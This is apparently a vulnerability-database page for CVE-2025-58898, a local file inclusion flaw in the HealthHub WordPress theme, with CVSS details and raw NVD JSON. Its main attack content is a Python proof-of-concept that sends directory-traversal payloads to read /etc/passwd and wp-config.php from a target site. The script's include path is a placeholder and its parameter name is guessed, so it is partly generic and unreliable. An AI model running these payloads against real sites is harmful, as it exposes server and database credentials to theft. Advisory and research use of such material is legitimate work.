Security Vulnerability Report
中文
CVE-2025-58898 CVSS 8.1 HIGH

CVE-2025-58898

Published: 2025-12-18 08:15:59
Last Modified: 2026-04-27 19:16:17

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes HealthHub healthhub allows PHP Local File Inclusion.This issue affects HealthHub: from n/a through <= 1.3.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ancorathemes:healthhub:*:*:*:*:*:wordpress:*:* - VULNERABLE
HealthHub <= 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-58898 PoC - Local File Inclusion in HealthHub Theme # Target: WordPress site with HealthHub theme <= 1.3.0 target = "http://target-site.com" # POC 1: Read /etc/passwd payload1 = "/etc/passwd" params = {"page": payload1} # or "template", "file" depending on vulnerable parameter url1 = f"{target}/wp-content/themes/healthhub/some-include-file.php" print(f"[*] Attempting to read {payload1}") response1 = requests.get(url1, params=params) if "root:" in response1.text: print("[+] /etc/passwd content leaked:") print(response1.text[:500]) # POC 2: Read wp-config.php payload2 = "../../../../wp-config.php" url2 = f"{target}/wp-content/themes/healthhub/some-include-file.php" params2 = {"page": payload2} print(f"\n[*] Attempting to read wp-config.php") response2 = requests.get(url2, params=params2) if "DB_NAME" in response2.text: print("[+] wp-config.php content leaked:") print(response2.text[:500]) # POC 3: Directory traversal to read other sensitive files payload3 = "../../../../etc/hostname" url3 = f"{target}/wp-content/themes/healthhub/some-include-file.php" params3 = {"page": payload3} print(f"\n[*] Attempting to read /etc/hostname") response3 = requests.get(url3, params=params3) print(f"[*] Response: {response3.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58898", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:59.083", "lastModified": "2026-04-27T19:16:16.833", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes HealthHub healthhub allows PHP Local File Inclusion.This issue affects HealthHub: from n/a through <= 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ancorathemes:healthhub:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.3.0", "matchCriteriaId": "4626E1C6-7A06-4C03-BCB7-9398527A3A78"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/healthhub/vulnerability/wordpress-healthhub-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}